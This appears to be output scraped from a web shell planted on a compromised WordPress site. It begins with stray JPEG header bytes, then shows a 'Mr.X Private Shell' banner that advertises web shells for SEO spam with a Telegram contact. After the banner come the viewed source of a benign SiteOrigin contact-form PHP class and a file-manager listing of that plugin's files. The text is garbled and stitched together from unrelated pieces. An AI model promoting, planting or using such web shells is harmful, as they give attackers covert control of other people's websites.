����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
abstract class SiteOrigin_Widget_ContactForm_Field_Base {
/**
* The options for this field. Used when enqueueing styles and scripts and rendering the field.
*
* @access protected
* @var array
*/
protected $options;
private $type;
public function __construct( $options ) {
$this->options = $options;
$this->init();
}
private function init() {
$this->initialize( $this->options );
}
protected function initialize( $options ) {
}
abstract protected function render_field( $options );
public function render() {
$this->render_field( $this->options );
}
public static function add_custom_attrs( $type ) {
$attr = apply_filters( 'siteorigin_widgets_contact_field_attr', array() , $type );
foreach ( $attr as $k => $v ) {
echo esc_attr( $k ) . '="' . esc_attr( $v ) . '" ';
}
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| base.class.php | File | 827 B | 0644 |
|
| checkboxes.class.php | File | 1.1 KB | 0644 |
|
| email.class.php | File | 328 B | 0644 |
|
| name.class.php | File | 507 B | 0644 |
|
| number.class.php | File | 330 B | 0644 |
|
| radio.class.php | File | 810 B | 0644 |
|
| select.class.php | File | 1.36 KB | 0644 |
|
| subject.class.php | File | 560 B | 0644 |
|
| tel.class.php | File | 324 B | 0644 |
|
| text.class.php | File | 696 B | 0644 |
|
| textarea.class.php | File | 543 B | 0644 |
|